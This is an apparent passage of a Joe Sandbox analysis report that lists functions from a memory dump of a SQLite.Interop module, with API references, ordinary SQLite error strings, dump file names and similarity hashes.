Instruction Fuzzy Hash: 1B71F771E1D1804BD7118F28C460756FFB2AB82328F5D86E8D6D94F342F73AEA468791

Function 6BC482C0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

SI8b0d9e6837e61abc.SQLITE.INTEROP ref: 6BC48336
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,000000FF), ref: 6BC48438
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC48441
SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC48454
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC48461
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC4846E

Strings

domain error, xrefs: 6BC4831F

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.$I1bf8975e567ea97a.I8b0d9e6837e61abc.
String ID: domain error
API String ID: 2338593189-1959930803
Opcode ID: ff3ff1db4aee24c9afe8fe37f060c2bfa212e383efaa8d6771fc6916a064bcc5
Instruction ID: 249dbd912de531e07c4443d27d9bafefa2f85c4478b349916211f3a4534b8dd8
Opcode Fuzzy Hash: ff3ff1db4aee24c9afe8fe37f060c2bfa212e383efaa8d6771fc6916a064bcc5
Instruction Fuzzy Hash: 955126B2E253115BC7009F7C9C5195BB395ABC5228F148A79FD6887340FB39DB0987E2

Function 6BC606F0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011969,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,00000000,?), ref: 6BC60723

Strings

%s at line %d of [%.10s], xrefs: 6BC6071C, 6BC607FD, 6BC60827, 6BC6088B
database corruption, xrefs: 6BC60717, 6BC607F8, 6BC60822, 6BC60886
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC6070D, 6BC607EE, 6BC60818, 6BC6087C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 21a267572818511d7afb8fb615dd1b0ce006302aa0473ddb86ed7d801f323754
Instruction ID: 9c5ca587fbcf9d4bd1db182de7b145f80b5248bde019e740614fb256cc1144e5
Opcode Fuzzy Hash: 21a267572818511d7afb8fb615dd1b0ce006302aa0473ddb86ed7d801f323754
Instruction Fuzzy Hash: FC515971A151056BC304DF69D8C5E9AB7A0FF48365F104095E90CEB681F738EAA0CBF1

Function 6BC4A630 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 158COMMON

Download Yara Rule

APIs

SI94ecb64e9dbb8338.SQLITE.INTEROP ref: 6BC4A65D
SIffb8076c269e2a85.SQLITE.INTEROP ref: 6BC4A702
SI8b0d9e6837e61abc.SQLITE.INTEROP ref: 6BC4A70D

Strings

%lld, xrefs: 6BC4A6EC
%!.15g, xrefs: 6BC4A669
NULL, xrefs: 6BC4A7B0, 6BC4A7CF
%!.20e, xrefs: 6BC4A6CE

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I8b0d9e6837e61abc.I94ecb64e9dbb8338.Iffb8076c269e2a85.
String ID: %!.15g$%!.20e$%lld$NULL
API String ID: 346610330-655469614
Opcode ID: da801f3807cd9422f6f93b47daede752b1805783476293e9c5de71029b22b640
Instruction ID: 4ff40bbf2cad50d05c94de46ba2255cbaf286a070e0f9498d04a96900a6a7e75
Opcode Fuzzy Hash: da801f3807cd9422f6f93b47daede752b1805783476293e9c5de71029b22b640
Instruction Fuzzy Hash: EC418B759145045BD320DF78A84166EB7F8EFC5319B0445FEE8498A602FB3AA71983E2

Function 6BC8B120 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000136D0,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC8B2BF

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid,?,6BC560BE), ref: 6BC55DD8

_memset.LIBCMT ref: 6BC8B1E3
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC8B261

Strings

%s at line %d of [%.10s], xrefs: 6BC8B2B8
source and destination must be distinct, xrefs: 6BC8B174
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC8B2A9
misuse, xrefs: 6BC8B2B3

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.$Iaa0f8e0c251cfd1d._memset
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse$source and destination must be distinct
API String ID: 3417782715-2726992392
Opcode ID: 6c3bf5be025587376f2470ff37ca633f1416b4047acafc49cd9af98cb3bc96f8
Instruction ID: 39a78f856c2e16b72534fe9bf0ca7f8de28dd627641fe34aedded77650d0b8a2
Opcode Fuzzy Hash: 6c3bf5be025587376f2470ff37ca633f1416b4047acafc49cd9af98cb3bc96f8
Instruction Fuzzy Hash: B441F5B0A213019BEB009F799846B0BBBA4BF4171DF404439E959DF241FB3EE615C7A6

Function 6BCC1010 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 140COMMON

Download Yara Rule

APIs

SIa364946505687432.SQLITE.INTEROP(?,?,?,?,?,6BCC19E2,?,?,?), ref: 6BCC1052

Strings

cannot open value of type %s, xrefs: 6BCC109D
integer, xrefs: 6BCC1094, 6BCC109C
no such rowid: %lld, xrefs: 6BCC1137
null, xrefs: 6BCC1083
real, xrefs: 6BCC108A
d, xrefs: 6BCC105C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Ia364946505687432.
String ID: cannot open value of type %s$d$integer$no such rowid: %lld$null$real
API String ID: 933419003-3431996195
Opcode ID: 54fa216b0adaef93eb84e98f9d25253a0b4e75208d2c84eecc8044f07c9ee9b9
Instruction ID: 5b358bf281b5dd9f6593cc57922b2c2a9ee104ca81272d66e253bef1605192b7
Opcode Fuzzy Hash: 54fa216b0adaef93eb84e98f9d25253a0b4e75208d2c84eecc8044f07c9ee9b9
Instruction Fuzzy Hash: 8741CEB46147009FD714CF2AD881A2BB3F5FF89324F1086ADE8498B741E739E955CB92

Function 6BCED410 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BCED442
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000247EF,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCED513

Strings

%s at line %d of [%.10s], xrefs: 6BCED50C
fts5_source_id, xrefs: 6BCED4E8
fts5, xrefs: 6BCED47D, 6BCED4C7
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCED4FD
misuse, xrefs: 6BCED507

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d._memset
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$fts5$fts5_source_id$misuse
API String ID: 3064812586-629638660
Opcode ID: 0114d37d109b577fe066b85681b8475aa864acf6d8a361ce1fe570a13cbbbc80
Instruction ID: 214b1f5a0e16dbf1319ac2e3f8b211b3ca98b1a5097d34d94a298ae4b1d2361a
Opcode Fuzzy Hash: 0114d37d109b577fe066b85681b8475aa864acf6d8a361ce1fe570a13cbbbc80
Instruction Fuzzy Hash: 8E2122B2BB621163E2201B396C43B57369C8B90669F004478FD59DE282FB6DE71681F6

Function 6BC575C0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 40COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid), ref: 6BC575E6
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AD91,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57604

Strings

%s at line %d of [%.10s], xrefs: 6BC575FD
API call with %s database connection pointer, xrefs: 6BC575DF
invalid, xrefs: 6BC575DA
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC575EE
misuse, xrefs: 6BC575F8

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$invalid$misuse
API String ID: 2981141233-2531747836
Opcode ID: 8d19f85dc50f302233b793f25540b3926d9a4c1611aacdf0a5bea18749cfde07
Instruction ID: 1e180d15bdb73781cee939e024cdbba00455dca60822f5fa69085d760c1bf814
Opcode Fuzzy Hash: 8d19f85dc50f302233b793f25540b3926d9a4c1611aacdf0a5bea18749cfde07
Instruction Fuzzy Hash: 10F024329AD2482AEA04565CFC02F553F96870132CF0000DEF05C5E083FE1E96A61279

Function 6BC55DA0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 37COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid,?,6BC560BE), ref: 6BC55DD8

Strings

NULL, xrefs: 6BC55DA5
API call with %s database connection pointer, xrefs: 6BC55DAA, 6BC55DD1, 6BC55DE9
invalid, xrefs: 6BC55DCC
unopened, xrefs: 6BC55DE4

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: API call with %s database connection pointer$NULL$invalid$unopened
API String ID: 2981141233-406007132
Opcode ID: f0020c697d1d329516df6d3be3aefab856004e8aca870adba7dbe1ae09c2faea
Instruction ID: 55754560ac5e91fb18ede40040192f1255f05bb384d9e009d1f2ba0f9de46dff
Opcode Fuzzy Hash: f0020c697d1d329516df6d3be3aefab856004e8aca870adba7dbe1ae09c2faea
Instruction Fuzzy Hash: 6AE065A37FF24419D92417742C0AF9D2B96079132AF1404A6F66A9C4D5FE4C42B92035

Function 6BC57550 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 34COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid), ref: 6BC57575
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AD9A,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000015,API call with %s database connection pointer,invalid), ref: 6BC57590

Strings

%s at line %d of [%.10s], xrefs: 6BC57589
API call with %s database connection pointer, xrefs: 6BC5756E
invalid, xrefs: 6BC57569
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5757A
misuse, xrefs: 6BC57584

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$invalid$misuse
API String ID: 2981141233-2531747836
Opcode ID: 756339f74be97c747111192116e1de32f208dda1e80f1b0426a0c598ba119308
Instruction ID: 00750278c7846cad828bd457a85a0c4ef59ebcb34e30c06677a48a65f4b3a10a
Opcode Fuzzy Hash: 756339f74be97c747111192116e1de32f208dda1e80f1b0426a0c598ba119308
Instruction Fuzzy Hash: 3BF05C716A92482EDB1447549C01F693B45874571DF4040DAF07C1E4C6F90D96F36329

Function 6BC42200 Relevance: 12.2, APIs: 8, Instructions: 200COMMON

Download Yara Rule

APIs

SIb50fc3839c421869.SQLITE.INTEROP(?,?,?,?,000000FF), ref: 6BC4226D
SIb50fc3839c421869.SQLITE.INTEROP(?,?,00000000,?,000000FF), ref: 6BC4228A
SI353770fd94e573c1.SQLITE.INTEROP(?,?,?,000000FF), ref: 6BC422C5
SI353770fd94e573c1.SQLITE.INTEROP(?,?), ref: 6BC422E3
SI353770fd94e573c1.SQLITE.INTEROP(?,?), ref: 6BC42301
SI353770fd94e573c1.SQLITE.INTEROP(?,?), ref: 6BC4231F
SIb50fc3839c421869.SQLITE.INTEROP(?,?,?), ref: 6BC4234E
SI353770fd94e573c1.SQLITE.INTEROP(?,?), ref: 6BC4236C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I353770fd94e573c1.$Ib50fc3839c421869.
String ID:
API String ID: 3315215020-0
Opcode ID: 60f8604eb81737938b47588dc775fddc0712b0f32a02d1c1925758484c29ff29
Instruction ID: 1a50089c7efadd6bdbd70f5115d3ea46837cf266a2a50cca6b821c3ccfe74789
Opcode Fuzzy Hash: 60f8604eb81737938b47588dc775fddc0712b0f32a02d1c1925758484c29ff29
Instruction Fuzzy Hash: FA517176B281046FC700DF68EC459AA73E9EBC9239F1486A5FD1CCB341E635DA518BE0

Function 6BC59F90 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 491COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0001235A,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,74FF8504,6BC8AEB6,00000001,?,?,?,?,?,6BC68251,74FF8504,?), ref: 6BC59FD9

Strings

%s at line %d of [%.10s], xrefs: 6BC59FD2, 6BC5A418, 6BC5A43D
database corruption, xrefs: 6BC59FCD, 6BC5A413, 6BC5A438
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC59FC3, 6BC5A409, 6BC5A42E, 6BC5A492

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: c77d4c56df6e194c8bb1e8e950e984617d9168c56e8a329e15bc92b56fac6ce9
Instruction ID: 96721d92eb012ae05e5a6d83e6bd4e99b5f312838d84b7398d87465fdce3e7ea
Opcode Fuzzy Hash: c77d4c56df6e194c8bb1e8e950e984617d9168c56e8a329e15bc92b56fac6ce9
Instruction Fuzzy Hash: 7F12AE72A153118FC705CF29C484A0AB7E1FFC8354F554598F8899B341EB38EE66CBA5

Function 6BC27DB0 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 465COMMON

Download Yara Rule

Strings

true, xrefs: 6BC28122
null, xrefs: 6BC280E0
false, xrefs: 6BC2816F

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: false$null$true
API String ID: 0-2913297407
Opcode ID: 72d4e76fdd83705908e81b7e26c21953da9396721a69e2673f232ba111e31d01
Instruction ID: 4c2d2fa32e8175179417d98cc7c87be8290f07b2d81ba0de2a95bda31bde4891
Opcode Fuzzy Hash: 72d4e76fdd83705908e81b7e26c21953da9396721a69e2673f232ba111e31d01
Instruction Fuzzy Hash: 8EE1893091D2454FD714CE2DC880F66BBE2DF46329F0845EAD9988F146F73EDA8687A1

Function 6BC2B3F0 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 408COMMON

Download Yara Rule

Strings

vtable constructor failed: %s, xrefs: 6BC2B5D1
hidden, xrefs: 6BC2B713
vtable constructor did not declare schema: %s, xrefs: 6BC2B655
vtable constructor called recursively: %s, xrefs: 6BC2B572

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
API String ID: 0-1299490920
Opcode ID: 06b08d919b45a7a0690c6936d5ea0dabb71af5c0a7032ac27e50795e9c1937e5
Instruction ID: 4d15ae29540f9e57a431f8e9bd725780d2a53ea0a6a5a35edd9f5af08eab7332
Opcode Fuzzy Hash: 06b08d919b45a7a0690c6936d5ea0dabb71af5c0a7032ac27e50795e9c1937e5
Instruction Fuzzy Hash: A6F18270E152059FDB00CF68C481A9ABBF5FF49308F1485A9E959DF301E739EA56CBA0

Function 6BC5AAD0 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 379COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC5AB22
SI9a326fe0ddbebf12.SQLITE.INTEROP(-00008000,00000000), ref: 6BC5AC39
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC5AC6C

Strings

recovered %d frames from WAL file %s, xrefs: 6BC5AEAC

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I9a326fe0ddbebf12.Unothrow_t@std@@@__ehfuncinfo$??2@_memset
String ID: recovered %d frames from WAL file %s
API String ID: 4193966855-1429783703
Opcode ID: dacadefef50d78a9852a45da04bffaab15e17d3e59f8a416c59ac83eeb9b56fe
Instruction ID: 1540fa1eb81f0b3b7519ca28b7cea8f3cdc45efafcb4abea8fda80819c6cf7f7
Opcode Fuzzy Hash: dacadefef50d78a9852a45da04bffaab15e17d3e59f8a416c59ac83eeb9b56fe
Instruction Fuzzy Hash: AED1ACB2E106049FD714CFA9C891B9EB7F5FF88300F104569E546AB350E778EAA1CB64

Function 6BC643E0 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 349COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC6450B
_memmove.LIBCMT ref: 6BC64555
